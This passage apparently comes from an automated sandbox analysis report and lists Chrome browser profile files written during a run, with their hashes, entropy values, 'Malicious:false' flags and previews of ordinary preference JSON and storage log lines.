                                                                                                                                                                                                                        Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13283320129957883","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":200,"left":0,"maximized":false,"right":516,"top":0,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PreferencesMP (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):5467
                                                                                                                                                                                                                        Entropy (8bit):5.186977647949688
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:n6A3kpt9Uz0aScKI5ok0JCKL8ibOTQVuwn:n6xH9UwcO4Kf
                                                                                                                                                                                                                        MD5:B5E0AF68004C8ABAFC6802C2DFC85C25
                                                                                                                                                                                                                        SHA1:6FAB370712F0A7531781E74E3FC101BDF4C4387E
                                                                                                                                                                                                                        SHA-256:5503C11BDC411307B4290160BE95B68192437F7B95D6F8A022366D476786BD37
                                                                                                                                                                                                                        SHA-512:307878330359C8B528FD5674FB99D6F27E7A1478D86B42CAFC1C879BC2BD90C066BCB02138ED2A40D448906201CA92EFD2844DAEDD27C57B17D1B07D65C5ACD0
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13283320129957883","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":200,"left":0,"maximized":false,"right":516,"top":0,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferencest\ (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):4871
                                                                                                                                                                                                                        Entropy (8bit):4.96374295872605
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:YciUkPkTiHj5c3WbEEqAOqqTlYqlQKHoTw0amH3CH3G/s8C1Nfct/9BhUJo3Khm8:n6A3/pt9pcKI5ok0JCKL8ibOTQVuwn
                                                                                                                                                                                                                        MD5:8DBC99D2A9E830480F8803B2FC4402BC
                                                                                                                                                                                                                        SHA1:84A99F5EB43D12F33D8FE0ACD0053C32721BA515
                                                                                                                                                                                                                        SHA-256:489351082DA1973C3829B6DD02EC74D218A78C3450F55F0204963A46FCC6B6C0
                                                                                                                                                                                                                        SHA-512:4799D3E8B3825D7DCEAFBCDCAF5C96EA2ED82C7D774BDB6380502809196C49A5535A4B52350BD51958ECD7B2FEF7666239F4D054E84008DDADC3AB486C1A675D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"account_id_migration_state":2,"account_tracker_service_last_update":"13283320129957883","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":200,"left":0,"maximized":false,"right":516,"top":0,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Reporting and NEL
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):36864
                                                                                                                                                                                                                        Entropy (8bit):0.6516396427405485
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:TUIopK2rJNVr1GJmm8pF82phrJNVrdHX/cjrJN2yJ1n4n1GmhGU1cEBYoTRs2oTf:wIElwQF8mpcSasL2YK71
                                                                                                                                                                                                                        MD5:1E11B9BB0E3E6F6E0159D2D66EC42FCF
                                                                                                                                                                                                                        SHA1:DBBD61BB18B0A87EF4E4287CA43465D73DC1B5EF
                                                                                                                                                                                                                        SHA-256:A6B31BC98806DAB32FC6E6E82A946E20860237BD424D2489A345A73DEAA787BA
                                                                                                                                                                                                                        SHA-512:C68BF02FD15BD8F95B2230671137FB29DDE4FAE91052406B1D8E68E0C316052B0981B1F5F960CD50E19E75A593CF467D6924DA220A9376B81490CC07B7FD75CE
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C..........g...^.........j............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):21244
                                                                                                                                                                                                                        Entropy (8bit):5.552044581640642
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:dWItTLlVjXi1kXqKf/pUZNCgVLH2HfD8rULHGqnTM6zvO4kyK:TLl9i1kXqKf/pUZNCgVLH2HfgrUbGqnI
                                                                                                                                                                                                                        MD5:B040EF7F2EC00997C30F14B28FA73FDD
                                                                                                                                                                                                                        SHA1:9F52CFCE8C275F9275DF204CCDC7C6642E5F576F
                                                                                                                                                                                                                        SHA-256:853303EEAF0981B8AFF4388B6132F71D4043CE46B002D0564E18B5DE0CC0F730
                                                                                                                                                                                                                        SHA-512:849D7BA46B176AB2F012E57A47B4D1E7E14682D49D0B1F160BFE35CAD594644793344713B6AD764A5C2B1363C6B462E01DC42F50AE5DB524F51478B9D88B7D13
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13283320129404746","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesE~ (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15601
                                                                                                                                                                                                                        Entropy (8bit):5.603196901480548
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:dWItTLlVjXi1kXqKf/pUZNCgVLH2HfD8rUv6hO4B0:TLl9i1kXqKf/pUZNCgVLH2HfgrUvIOJ
                                                                                                                                                                                                                        MD5:97ABBEFBFD124D80BB39B643FD4F2BE3
                                                                                                                                                                                                                        SHA1:F40A5119D6272F27074A48BD3C4436B5985B7DC3
                                                                                                                                                                                                                        SHA-256:626E68C4F0F13218D8EE29EB8F00668595D1D759313A0B714C3072BBEFE10FA2
                                                                                                                                                                                                                        SHA-512:DFE0CD43908BEE905E89531BB1E7D3DA7BDE2A31CCA2FCFE401489A3F48034409631481F2C743ABA54CF719FA35C98C44410B6366866781E7942523FE66EA986
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13283320129404746","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):327
                                                                                                                                                                                                                        Entropy (8bit):2.5384726236607107
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:S85aEFljljljljljljljljljljljljljljl:S+a8ljljljljljljljljljljljljljlZ
                                                                                                                                                                                                                        MD5:A66EFAA590A0D16B1874A35836BA0A4B
                                                                                                                                                                                                                        SHA1:BB750C61E162420271F89A90F2B58F43587680E1
                                                                                                                                                                                                                        SHA-256:B9AB1ED7609E2254B7D4FB655B57B21B2BE601646C4FF0B207C411E8BDD9E654
                                                                                                                                                                                                                        SHA-512:2B1EA0C798B69B360AB1546D14FCCF7D5F9CB224B31BC8430CDB956C8CC570A086E4CFA10E6A843292DEB862F4161DFC9B9ABBC44AFE397FF0EC9563646FF7A5
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: *...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f...............
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):320
                                                                                                                                                                                                                        Entropy (8bit):5.223136151744134
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:mBPdZKQ+q2PWXp+N23iKKdKrQMxIFUtAPdZUgZmw2PdZUQVkwOWXp+N23iKKdKrb:uPeVva5KkCFUtAPAg/2PAI5f5KktJ
                                                                                                                                                                                                                        MD5:CEB4BEDCB8FB5D50A771A7B9E5DA2D52
                                                                                                                                                                                                                        SHA1:4611560351D21C6AB77569D468FACC94D6CACFBB
                                                                                                                                                                                                                        SHA-256:4ED67066B88E536B57CD02CA4439984ABF2EDABF47FB358DE57324099CF5B653
                                                                                                                                                                                                                        SHA-512:A17BC3AF37F6EADF640786F658A6F6180FE9012832A89666EC84A88A217AEC279C08FD77F75E5E855FEDA6FCC0ADC554A080AD5B40FC11D43D6681A13D3D7E29
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:49.907 1bf8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/MANIFEST-000001.2021/12/06-19:08:49.909 1bf8 Recovering log #3.2021/12/06-19:08:49.909 1bf8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG.old (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):320
                                                                                                                                                                                                                        Entropy (8bit):5.223136151744134
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:mBPdZKQ+q2PWXp+N23iKKdKrQMxIFUtAPdZUgZmw2PdZUQVkwOWXp+N23iKKdKrb:uPeVva5KkCFUtAPAg/2PAI5f5KktJ
                                                                                                                                                                                                                        MD5:CEB4BEDCB8FB5D50A771A7B9E5DA2D52
                                                                                                                                                                                                                        SHA1:4611560351D21C6AB77569D468FACC94D6CACFBB
                                                                                                                                                                                                                        SHA-256:4ED67066B88E536B57CD02CA4439984ABF2EDABF47FB358DE57324099CF5B653
                                                                                                                                                                                                                        SHA-512:A17BC3AF37F6EADF640786F658A6F6180FE9012832A89666EC84A88A217AEC279C08FD77F75E5E855FEDA6FCC0ADC554A080AD5B40FC11D43D6681A13D3D7E29
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:49.907 1bf8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/MANIFEST-000001.2021/12/06-19:08:49.909 1bf8 Recovering log #3.2021/12/06-19:08:49.909 1bf8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):348
                                                                                                                                                                                                                        Entropy (8bit):5.193276576134978
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:mBPdT3FN+q2PWXp+N23iKKdK7Uh2ghZIFUtAPdMyZZmw2PdHhVkwOWXp+N23iKKF:uPJ3FIva5KkIhHh2FUtAP6A/2P55f5KF
                                                                                                                                                                                                                        MD5:485683A7B86CB42ADAB93B719E0A6D31
                                                                                                                                                                                                                        SHA1:670BCC1B3574CA8EA852C2DC276802BB3711FFFD
                                                                                                                                                                                                                        SHA-256:004D77977EB76FEA1A00A9F25A70361CE4414A083130794C620CF458BAC5508B
                                                                                                                                                                                                                        SHA-512:4E94D8B7C10AB03BA5686C61622C4B0131CE16FE7FAF25F074BC2C8D66F3BAAA502459E5F212B0340D9410F6C4FF87C417F65EBA18557741AE0B4EF47AF9F7AD
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:49.399 1ab8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database/MANIFEST-000001.2021/12/06-19:08:49.405 1ab8 Recovering log #3.2021/12/06-19:08:49.410 1ab8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG.old (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):348
                                                                                                                                                                                                                        Entropy (8bit):5.193276576134978
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:mBPdT3FN+q2PWXp+N23iKKdK7Uh2ghZIFUtAPdMyZZmw2PdHhVkwOWXp+N23iKKF:uPJ3FIva5KkIhHh2FUtAP6A/2P55f5KF
                                                                                                                                                                                                                        MD5:485683A7B86CB42ADAB93B719E0A6D31
                                                                                                                                                                                                                        SHA1:670BCC1B3574CA8EA852C2DC276802BB3711FFFD
                                                                                                                                                                                                                        SHA-256:004D77977EB76FEA1A00A9F25A70361CE4414A083130794C620CF458BAC5508B
                                                                                                                                                                                                                        SHA-512:4E94D8B7C10AB03BA5686C61622C4B0131CE16FE7FAF25F074BC2C8D66F3BAAA502459E5F212B0340D9410F6C4FF87C417F65EBA18557741AE0B4EF47AF9F7AD
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:49.399 1ab8 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database/MANIFEST-000001.2021/12/06-19:08:49.405 1ab8 Recovering log #3.2021/12/06-19:08:49.410 1ab8 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\data_1
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb\LOG
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):430
                                                                                                                                                                                                                        Entropy (8bit):5.287983506788667
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:mBPdZ9q2PWXp+N23iKKdKusNpV/2jMGIFUtAPdZS9Zmw2PdZSPkwOWXp+N23iKKZ:uPxva5KkFFUtAPG9/2PGP5f5KkOJ
                                                                                                                                                                                                                        MD5:1D76076185D919F0CB58557EAB8E4502
                                                                                                                                                                                                                        SHA1:5402CB098BCE46550C2B0C1E5B35422A48C54696
                                                                                                                                                                                                                        SHA-256:1A82E775149E1B5BA8CE0D5DEA84662CB6D01B01AE3FB688B27120BB88F36F48
                                                                                                                                                                                                                        SHA-512:9D8A29B964147281581D4B1C3BA9813E3578526FB3CAE04EE20429A8BFBC81DC37C3FCBC38F5D20689138D21E46E144B23A502CA1E663526DAF97DFE34C82697
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:49.971 1b04 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb/MANIFEST-000001.2021/12/06-19:08:49.973 1b04 Recovering log #3.2021/12/06-19:08:49.973 1b04 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb\LOG.old (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):430
                                                                                                                                                                                                                        Entropy (8bit):5.287983506788667
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:mBPdZ9q2PWXp+N23iKKdKusNpV/2jMGIFUtAPdZS9Zmw2PdZSPkwOWXp+N23iKKZ:uPxva5KkFFUtAPG9/2PGP5f5KkOJ
                                                                                                                                                                                                                        MD5:1D76076185D919F0CB58557EAB8E4502
                                                                                                                                                                                                                        SHA1:5402CB098BCE46550C2B0C1E5B35422A48C54696
                                                                                                                                                                                                                        SHA-256:1A82E775149E1B5BA8CE0D5DEA84662CB6D01B01AE3FB688B27120BB88F36F48
                                                                                                                                                                                                                        SHA-512:9D8A29B964147281581D4B1C3BA9813E3578526FB3CAE04EE20429A8BFBC81DC37C3FCBC38F5D20689138D21E46E144B23A502CA1E663526DAF97DFE34C82697
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:49.971 1b04 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb/MANIFEST-000001.2021/12/06-19:08:49.973 1b04 Recovering log #3.2021/12/06-19:08:49.973 1b04 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Network Persistent State (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):420
                                                                                                                                                                                                                        Entropy (8bit):4.985305467053914
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:YHpoNXR8+eq7JdV5qQlsDHF4xj70PpqQEsDHF4R8HLJ2AVQBR70S7PMVKJw1K3Ky:YHO8sdBsB6MAsBdLJlyH7E4f3K33y
                                                                                                                                                                                                                        MD5:C401B619D9D8E0ADABC25A47EE49CFBA
                                                                                                                                                                                                                        SHA1:C9D3B816DD3FBCD98E9C0A32CEC7B501EFC0BBDA
                                                                                                                                                                                                                        SHA-256:8F5D75F5EF9876E8D30CE477509F735B50C4D87DBEDB433BE8EDBE6D4B3CB82F
                                                                                                                                                                                                                        SHA-512:BC12F16CB95CB0AD708C6BBD005EF863A8552613E612F1084086E0F8262752E1B5144D044F0D141CE8462CC33343C36B517A5CC778751680485D8F88FB51B862
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248543490879170","port":443,"protocol_str":"quic"},{"advertised_versions":[73],"expiration":"13248543490879171","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications\LOG
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):432
                                                                                                                                                                                                                        Entropy (8bit):5.263005348999731
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:uPaN+va5KkmiuFUtAP5Y/2PJNV5f5Kkm2J:mra5KkSgMvJlf5Kkr
                                                                                                                                                                                                                        MD5:457B3BEEFF08B762771070F7CD284E0E
                                                                                                                                                                                                                        SHA1:2F6165FCCD7250B688671CD987789503B9DFF609
                                                                                                                                                                                                                        SHA-256:A1D3954108A97CDE0B6A10DE2D7DA06C8122E56F434F8D2E5A7DD0EA9F49223F
                                                                                                                                                                                                                        SHA-512:D8AD264D9B18F9D919B11E52F6CE2D53C9EB3847B7543B001810857454F3DFB27E2D695B3CAA2A8FDBCEE427C6603B8F2568DD5C72952BD366B21912970CFFE3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:50.080 1b0c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications/MANIFEST-000001.2021/12/06-19:08:50.084 1b0c Recovering log #3.2021/12/06-19:08:50.102 1b0c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications\LOG.old (copy)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):432
                                                                                                                                                                                                                        Entropy (8bit):5.263005348999731
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:uPaN+va5KkmiuFUtAP5Y/2PJNV5f5Kkm2J:mra5KkSgMvJlf5Kkr
                                                                                                                                                                                                                        MD5:457B3BEEFF08B762771070F7CD284E0E
                                                                                                                                                                                                                        SHA1:2F6165FCCD7250B688671CD987789503B9DFF609
                                                                                                                                                                                                                        SHA-256:A1D3954108A97CDE0B6A10DE2D7DA06C8122E56F434F8D2E5A7DD0EA9F49223F
                                                                                                                                                                                                                        SHA-512:D8AD264D9B18F9D919B11E52F6CE2D53C9EB3847B7543B001810857454F3DFB27E2D695B3CAA2A8FDBCEE427C6603B8F2568DD5C72952BD366B21912970CFFE3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: 2021/12/06-19:08:50.080 1b0c Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications/MANIFEST-000001.2021/12/06-19:08:50.084 1b0c Recovering log #3.2021/12/06-19:08:50.102 1b0c Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications/000003.log .
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\000003.log
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):80
